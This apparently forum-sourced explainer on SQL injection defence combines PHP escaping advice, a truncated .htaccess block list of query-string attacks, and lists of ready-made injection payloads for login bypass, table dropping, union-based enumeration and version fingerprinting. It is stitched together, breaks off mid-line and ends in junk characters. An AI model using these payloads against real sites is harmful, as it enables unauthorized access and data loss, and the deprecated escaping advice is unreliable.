2) Always validate for the proper input like weather the value is valid 
email or not, is numeric or not , valid date or not etc.
 

3) Finally, Always use mysql_real_escape_string() function before 
sending the variable to the SQL query, it ad. For example

note you must be connected to the database for using this function
 
Code:
$username=mysql_real_escape_string($_POST['username']);
$password=mysql_real_escape_string($_POST['password']);

if a intruder inject ‘ OR 1 in the user name and password field then the value of the $username and $password will become \’ OR 1 which is not going to harm us anymore.



this might also help some one

.htaccess

Code:
# Block out any script trying to set a mosConfig value through the URL

RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]

# Block out any script trying to base64_encode crap to send via URL

RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]

# Block out any script that includes a 

What is SQL Injection?


SQL Injection

SQL injection is most common methodology employed by a hacker to exploit vulnerabilities in software applications. Vulnerabilities are basically weak links in the software that exposes unauthorized data/information to a user. SQL injection occurs when the user input is incorrectly filtered for embedded SQL statements.

The technique is powerful enough not only to expose the information to the user but also modify and delete the content which could prove disastrous to the company.

SQL injection vulnerabilities have three forms:


Incorrectly filtered special characters: escape characters

                                                                       

This form of SQL injection occurs when the user manipulates the SQL statements using characters such as ’. For instance consider that you need to enter username and password while logging into your account. The SQL statement generated will be:

“SELECT * FROM users WHERE password = ’” + password + “‘;”

Now suppose the userName and/or password so entered are” ‘ or ‘1’=’1”. So the SQL statement reaching the back end will be:


“SELECT * FROM users WHERE password =’ ‘or ‘1’=’1 ‘;”


Look closely at this statement. It is deciphered by the database as select everything from the table “user” having field name equal to ‘ ‘ or 1=1. During authentication process, this condition will always be valid as 1 will always equal 1. Thus this way the user is given unauthorized access.


List of Some Important inputs used by hackers to use SQL Injection technique are:

a) ‘ or ‘a’=’a
b) ‘ or 1=1 –
c) ‘ or 1=1; –
d) ‘; select * from *; –
e) ‘ (Single quote)(Here we look at the error)
f) ‘; drop table users –

On some SQL servers such as MS SQL Server any valid SQL command may be injected via this method, including the execution of multiple statements. The following value of “username” in the statement below would cause the deletion of the “users” table as well as the selection of all data from the “data” table (in essence revealing the information of every user):

a’;DROP TABLE users; SELECT * FROM data WHERE name LIKE ‘%

Incorrectly handling input data type


This form of SQL injection occurs when the user input is not strongly typed i.e. , the input by the user is not checked for data type constraint. For example consider a field where you are asked to enter your phone number. Since the phone number input is of numeric data type, therefore the input must be checked whether it is numeric or not. If not checked, then the user can send alphanumeric input and embedded SQL statements. Consider the following SQL statement:

“SELECT * FROM user WHERE telephone = “+ input +”;”
Now if I can input alphanumeric data say “11111111;DROP TABLE user” then I have embedded an SQL statement to delete the entire table “user”. This might prove detrimental to the company!!!

If you happen to know the database table name and column names, then any user can perform SQL injection using the following inputs:


1. ‘ having 1=1 –

2. ‘ group by user.id having 1=1 –
3. ‘ group by users.id, users.username, users.password, users.privs having 1=1—
4. ‘ union select sum(users.username) from users—
5. ‘ union select sum(id) from users –

Vulnerabilities inside the database server


Sometimes vulnerabilities can exist within the database server software itself, as was the case with the MySQL server’s real_escape_chars() functions.

If the database server is not properly configured then the access to the database can easily be found out by the hacker.
The hacker can get information regarding the database server using the following input:
‘ union select @@version,1,1,1—

1. Extended Stored Procedure Attacks

2. sp_who: this will show all users that are currently connected to the database.
3. xp_readmail, , , , ,@peek=’false’ : this will read all the mails and leave the message as unread.

In the same way there is a list of such extended stored procedures that can be used by the hacker to exploit vulnerabilities existing in software application at the database layer.

#############################################################
------------------------------------------------------.,.,;'[=-098&*(^$$#@!!~--------
..............................................>